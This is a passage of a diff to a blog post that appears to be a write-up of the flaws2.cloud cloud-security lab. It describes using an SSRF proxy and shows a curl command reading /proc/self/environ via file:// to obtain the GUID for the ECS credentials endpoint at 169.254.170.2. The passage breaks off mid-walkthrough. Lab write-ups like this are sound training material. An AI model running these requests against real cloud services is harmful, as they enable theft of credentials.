BrunoCaseiro/brunocaseiro.github.io/_posts/2025-10-04-Testing-pens-in-heaven.md

 The container's webserver you got access to includes a simple proxy that can be access with: http://container.target.flaws2.cloud/proxy/http://flaws.cloud or http://container.target.flaws2.cloud/proxy/http://neverssl.com
 ```

 Once again this screams SSRF!
-AWS containers running on ECS usually have their credentials at `169.254.170.2/v2/credentials/GUID`, where GUID is a value disclosed in the environment variables.
+For ECS task credentials, the metadata endpoint is typically `http://169.254.170.2/v2/credentials/GUID`, where GUID is a value disclosed in the environment variables.
 Using the proxy, we can exploit an LFI vulnerability
 ```
 ┌──(kali㉿kali)-[~]
 └─$ curl http://container.target.flaws2.cloud/proxy/file:///proc/self/environ --output out.txt